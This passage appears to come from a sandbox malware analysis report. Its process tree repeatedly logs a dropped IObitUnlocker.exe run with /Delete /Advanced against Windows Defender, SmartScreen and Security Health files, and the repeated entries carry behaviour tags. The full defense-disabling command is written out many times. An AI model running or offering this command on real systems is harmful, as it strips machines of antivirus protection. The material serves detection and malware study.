                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1796
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1576
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:552
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3904
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4556
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5712
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5376
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5372
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2900
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5900
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windows